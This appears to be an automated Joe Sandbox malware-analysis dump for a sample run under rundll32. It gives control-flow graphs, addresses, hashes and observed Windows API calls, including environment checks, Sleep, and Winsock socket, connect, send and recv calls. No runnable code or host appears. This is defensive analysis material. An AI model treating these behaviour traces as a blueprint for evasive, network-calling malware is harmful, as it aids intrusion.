7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3594->3612 3613 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 3594->3613 3612->3613 3631 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 3613->3631 3632 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3613->3632 3656 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 3631->3656 3657 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3631->3657 3632->3631 3686 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 3656->3686 3687 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3656->3687 3657->3656 3726 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 3686->3726 3727 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3686->3727 3687->3686 3764 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 3726->3764 3765 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3726->3765 3727->3726 3795 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 3764->3795 3796 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3764->3796 3765->3764 3830 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 3795->3830 3831 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3795->3831 3796->3795 3867 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 3830->3867 3868 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3830->3868 3831->3830 3903 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3867->3903 3904 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 3867->3904 3868->3867 3903->3904 3940 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3904->3940 3941 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 3904->3941 3940->3941 3941->3514 3970 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 3941->3970 3970->3514
                  APIs
                  • GetSystemDefaultLangID.KERNEL32(?,?,?), ref: 7EDBA916
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DefaultLangSystem
                  • String ID: :FailedAddIndicator$DD?ljh$c$interrupted${
                  • API String ID: 706401283-3635123605
                  • Opcode ID: 14886a258d478e1b3772912f4e3f5530a1f4a0dc43d5a020db30537024ab9ebf
                  • Instruction ID: dd56a6b3eb8498d89f726325573bd1681c7aa49a03a30daa5bcdf1b624b74834
                  • Opcode Fuzzy Hash: 14886a258d478e1b3772912f4e3f5530a1f4a0dc43d5a020db30537024ab9ebf
                  • Instruction Fuzzy Hash: 78139DB5D04258CBCB10EBA8CD45BDEBBB5AB49200F5085DDD44AB7246EB345F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4075 7edfe179-7edfe195 4076 7edfe197-7edfe1a1 4075->4076 4077 7edfe1a3 4075->4077 4078 7edfe1ad-7edfe26c call 7ee02f90 * 3 4076->4078 4077->4078 4085 7edfe270-7edfe27a 4078->4085 4086 7edfe7bc-7edfeba3 call 7ee02f90 * 3 call 7ede60e0 4085->4086 4087 7edfe280-7edfe2a4 IsValidCodePage 4085->4087 4122 7edfeba9-7edfebe2 4086->4122 4123 7edfed64-7edfed6e 4086->4123 4089 7edfe70c-7edfe7b7 4087->4089 4090 7edfe2aa-7edfe2bd IsZoomed 4087->4090 4089->4085 4093 7edfe2bf-7edfe2c9 4090->4093 4094 7edfe2cb 4090->4094 4097 7edfe2d5-7edfe2dc 4093->4097 4094->4097 4099 7edfe2de-7edfe2e8 4097->4099 4100 7edfe2ea 4097->4100 4102 7edfe2f4-7edfe300 4099->4102 4100->4102 4102->4089 4104 7edfe306-7edfe399 call 7ee02f90 call 7ee02fd0 4102->4104 4104->4089 4113 7edfe39f 4104->4113 4115 7edfe3ae-7edfe3b5 4113->4115 4116 7edfe3a1-7edfe3a8 4113->4116 4115->4089 4118 7edfe3bb 4115->4118 4116->4089 4116->4115 4120 7edfe3bd-7edfe3c4 4118->4120 4121 7edfe3ca-7edfe3dc 4118->4121 4120->4089 4120->4121 4126 7edfe44a-7edfe4dc call 7ee02f90 4121->4126 4127 7edfe5c6-7edfe636 call 7ee02f90 * 2 4121->4127 4128 7edfe3e3-7edfe445 4121->4128 4129 7edfe531-7edfe56b call 7ee02f90 4121->4129 4130 7edfebe4-7edfebf0 4122->4130 4131 7edfebf2-7edfebfc 4122->4131 4124 7edfed7c 4123->4124 4125 7edfed70-7edfed7a 4123->4125 4136 7edfed86-7edfeda3 4124->4136 4125->4136 4151 7edfe4de-7edfe4f0 4126->4151 4152 7edfe4f2-7edfe4f5 4126->4152 4163 7edfe64c-7edfe64f 4127->4163 4164 7edfe638-7edfe64a 4127->4164 4128->4089 4146 7edfe56d-7edfe57f 4129->4146 4147 7edfe581-7edfe584 4129->4147 4130->4131 4132 7edfebfe 4130->4132 4133 7edfec08-7edfec17 4131->4133 4132->4133 4138 7edfec19-7edfec23 4133->4138 4139 7edfec25 4133->4139 4142 7edfedbe 4136->4142 4143 7edfeda5 4136->4143 4145 7edfec2f-7edfec3b 4138->4145 4139->4145 4153 7edfedc8-7edfedd4 4142->4153 4149 7edfeda7-7edfedb0 4143->4149 4150 7edfedb2-7edfedbc 4143->4150 4156 7edfec3d-7edfec47 4145->4156 4157 7edfec49 4145->4157 4158 7edfe58c-7edfe5c1 4146->4158 4147->4158 4149->4142 4149->4150 4150->4153 4160 7edfe4fd-7edfe52c call 7ee02f90 4151->4160 4152->4160 4154 7edfee46-7edff20d call 7ee02f90 GetDialogBaseUnits call 7edb0670 call 7edcb9e0 GetPEB 4153->4154 4155 7edfedd6-7edfee42 call 7ee02f90 4153->4155 4194 7edff213-7edff2bc 4154->4194 4155->4154 4162 7edfec53-7edfec5c 4156->4162 4157->4162 4158->4089 4160->4089 4169 7edfec5e-7edfec7c 4162->4169 4170 7edfec8a 4162->4170 4171 7edfe657-7edfe6ce call 7ee02f90 4163->4171 4164->4171 4169->4170 4174 7edfec7e-7edfec88 4169->4174 4173 7edfec94-7edfeca2 4170->4173 4183 7edfe6e4-7edfe6e7 4171->4183 4184 7edfe6d0-7edfe6e2 4171->4184 4177 7edfecd5-7edfecde 4173->4177 4178 7edfeca4-7edfecd0 4173->4178 4174->4173 4181 7edfed5f 4177->4181 4182 7edfece0-7edfece6 4177->4182 4178->4181 4181->4154 4182->4181 4188 7edfece8-7edfed5c 4182->4188 4186 7edfe6ef-7edfe709 4183->4186 4184->4186 4186->4089 4188->4181 4197 7edff3f3-7edff429 4194->4197 4198 7edff2c2-7edff2cb 4194->4198 4197->4194 4199 7edff42f 4197->4199 4200 7edff2d1-7edff2f3 4198->4200 4201 7edff439-7edff460 4199->4201 4200->4197 4202 7edff2f9-7edff329 4200->4202 4207 7edff479 4201->4207 4208 7edff462-7edff46b 4201->4208 4203 7edff333-7edff359 4202->4203 4205 7edff35b-7edff367 4203->4205 4206 7edff369-7edff383 4203->4206 4209 7edff385-7edff38f 4205->4209 4206->4203 4206->4209 4211 7edff483-7edff487 4207->4211 4208->4207 4210 7edff46d-7edff477 4208->4210 4212 7edff3ee 4209->4212 4213 7edff391-7edff3ec 4209->4213 4210->4211 4214 7edff489 4211->4214 4215 7edff4a0 4211->4215 4212->4200 4213->4201 4216 7edff48b-7edff492 4214->4216 4217 7edff494-7edff49e 4214->4217 4218 7edff4aa-7edff5fd GetCommandLineW call 7edbf220 ExitProcess 4215->4218 4216->4215 4216->4217 4217->4218
                  APIs
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,00000000,?,00000000,00000000,?,?,FFFFFF05,FFFFFFFF), ref: 7EDFE28F
                  • IsZoomed.USER32(?), ref: 7EDFE2AE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodePageValidZoomed
                  • String ID: /%$:FailedAddIndicator$DD?ljh$QP>
                  • API String ID: 1499542914-2538035616
                  • Opcode ID: 5413ceb313cef25dea92ab7af7d7f51d9970b5f70dc17bf79f7d703b999358b2
                  • Instruction ID: cea3e179ea7ad720acdecbc728ded270510a1ed276fee96dc68239d9e522ecd1
                  • Opcode Fuzzy Hash: 5413ceb313cef25dea92ab7af7d7f51d9970b5f70dc17bf79f7d703b999358b2
                  • Instruction Fuzzy Hash: D1926979D04268CFDB24CF6AC890BADBBB5BF48300F20859AE459F7255DB349A81CF51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4226 7edbaadf-7edbab5a 4229 7edbd922-7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 4226->4229 4230 7edbab60-7edbad65 4226->4230 4312 7edb9e37-7edb9ead 4229->4312 4241 7edbad67-7edbad73 4230->4241 4242 7edbad75-7edbad92 4230->4242 4241->4242 4246 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 4242->4246 4247 7edbad94-7edbad9b 4242->4247 4246->4229 4268 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 4246->4268 4247->4246 4293 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 4268->4293 4294 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 4268->4294 4308 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 4293->4308 4309 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 4293->4309 4294->4293 4308->4309 4327 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4309->4327 4328 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 4309->4328 4327->4328 4346 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 4328->4346 4347 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4328->4347 4371 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 4346->4371 4372 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4346->4372 4347->4346 4401 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 4371->4401 4402 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4371->4402 4372->4371 4441 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 4401->4441 4442 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4401->4442 4402->4401 4479 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 4441->4479 4480 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4441->4480 4442->4441 4510 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 4479->4510 4511 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4479->4511 4480->4479 4545 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 4510->4545 4546 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4510->4546 4511->4510 4582 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 4545->4582 4583 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4545->4583 4546->4545 4618 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4582->4618 4619 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 4582->4619 4583->4582 4618->4619 4655 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4619->4655 4656 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 4619->4656 4655->4656 4656->4229 4685 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4656->4685 4685->4229
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$c$interrupted${
                  • API String ID: 0-3044989580
                  • Opcode ID: 097252247a6d8ebb45e39d0f8b5563c456452a57771fc32b7165d04ef569fc58
                  • Instruction ID: 8d3a80043cb5d53f556d60ce0deb3c29ba438c28c8120edbe1955a22ae0647ba
                  • Opcode Fuzzy Hash: 097252247a6d8ebb45e39d0f8b5563c456452a57771fc32b7165d04ef569fc58
                  • Instruction Fuzzy Hash: 95138CB5D04258CBCB10EBA8CD45BDEBBB5AB49200F5085DDD44AB7246EB345F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 4790 7edbad3d-7edbad65 4793 7edbad67-7edbad73 4790->4793 4794 7edbad75-7edbad92 4790->4794 4793->4794 4796 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 4794->4796 4797 7edbad94-7edbad9b 4794->4797 4807 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 4796->4807 4808 7edbd922-7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 4796->4808 4797->4796 4833 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 4807->4833 4834 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 4807->4834 4951 7edb9e37-7edb9ead 4808->4951 4849 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 4833->4849 4850 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 4833->4850 4834->4833 4849->4850 4869 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4850->4869 4870 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 4850->4870 4869->4870 4893 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 4870->4893 4894 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4870->4894 4923 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 4893->4923 4924 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4893->4924 4894->4893 4959 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 4923->4959 4960 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4923->4960 4924->4923 4999 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 4959->4999 5000 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4959->5000 4960->4959 5037 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 4999->5037 5038 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 4999->5038 5000->4999 5068 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 5037->5068 5069 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5037->5069 5038->5037 5103 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 5068->5103 5104 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5068->5104 5069->5068 5140 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 5103->5140 5141 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5103->5141 5104->5103 5176 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5140->5176 5177 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 5140->5177 5141->5140 5176->5177 5213 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5177->5213 5214 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 5177->5214 5213->5214 5214->4808 5243 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5214->5243 5243->4808
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: :FailedAddIndicator$c$interrupted${
                  • API String ID: 0-3044989580
                  • Opcode ID: 7a8de8b4a5340a1c6b5b037547e497bdd8507ba00a8c92f53128539143ef6102
                  • Instruction ID: a6d4703e51d17696db1a2c606f58faa7e654e781194dedaa404949a7ea32dcb2
                  • Opcode Fuzzy Hash: 7a8de8b4a5340a1c6b5b037547e497bdd8507ba00a8c92f53128539143ef6102
                  • Instruction Fuzzy Hash: 81137BB5D04258CBCB10EBA8CD45BDEBBB5AB49200F5085DDD44AB7246EB345F84CFA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 5348 7edbae34-7edbaed8 call 7ed945a0 call 7ed944b0 5355 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 5348->5355 5356 7edbd922-7edbdcd8 call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 5348->5356 5381 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 5355->5381 5382 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 5355->5382 5470 7edb9c63-7edb9e2d IsValidCodePage lstrlenA GetWindowTextLengthA 5356->5470 5397 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 5381->5397 5398 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 5381->5398 5382->5381 5397->5398 5417 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5398->5417 5418 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 5398->5418 5417->5418 5441 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 5418->5441 5442 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5418->5442 5471 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 5441->5471 5472 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5441->5472 5442->5441 5499 7edb9e37-7edb9ead 5470->5499 5507 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 5471->5507 5508 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5471->5508 5472->5471 5547 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 5507->5547 5548 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5507->5548 5508->5507 5585 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 5547->5585 5586 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5547->5586 5548->5547 5616 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 5585->5616 5617 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5585->5617 5586->5585 5651 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 5616->5651 5652 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5616->5652 5617->5616 5688 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 5651->5688 5689 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5651->5689 5652->5651 5724 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5688->5724 5725 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 5688->5725 5689->5688 5724->5725 5761 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5725->5761 5762 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 5725->5762 5761->5762 5762->5356 5791 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 5762->5791 5791->5356
                  APIs
                    • Part of subcall function 7EDCC510: std::exception::exception.LIBCMTD ref: 7EDCC540
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  • Sleep.KERNEL32(?), ref: 7EDBDCD2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeLengthPageSleepTextValidWindowlstrlenstd::exception::exception
                  • String ID: :FailedAddIndicator$c$interrupted${
                  • API String ID: 2070395257-3044989580
                  • Opcode ID: 749071661c0bfc45656a997889952dec993afc5c325f9934c277a8df9f61bc5f
                  • Instruction ID: c740e5af3623c6a7a3cde4b6a9994796117185d64579a339bacf158ab5e04136
                  • Opcode Fuzzy Hash: 749071661c0bfc45656a997889952dec993afc5c325f9934c277a8df9f61bc5f
                  • Instruction Fuzzy Hash: 9E036AB5D04258CBCB10EBA8CD45BDEBBB5AB49200F5085D9D44AB7246EB345F848FA2
                  APIs
                    • Part of subcall function 7ED93D80: std::ios_base::clear.LIBCPMTD ref: 7ED941EA
                  • socket.WS2_32(?,?,?), ref: 7EDF2C93
                  • gethostbyname.WS2_32(?), ref: 7EDF302F
                  • connect.WS2_32(?,?,?), ref: 7EDF3C25
                  • send.WS2_32(?,?,?,?), ref: 7EDF4019
                  • recv.WS2_32(?,?,?,?), ref: 7EDF4472
